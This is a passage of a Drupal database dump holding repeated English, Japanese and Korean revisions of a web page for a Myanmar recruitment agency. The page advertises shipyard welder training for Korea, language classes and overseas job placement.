('page', 0, 24, 311, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校, タイ語学校, 英語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 311, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 312, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>2. Co-opening and teaching Korean, Japanese, Thailand and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 312, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校, タイ語学校, 英語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 312, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어, 일본어, 태국어, 영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 313, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>2. Co-opening and teaching Korean, Japanese, Thailand and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 313, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校, タイ語学校, 英語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 313, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어, 일본어, 태국어, 영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 411, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>2. Co-opening and teaching Korean, Japanese, Thailand and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img 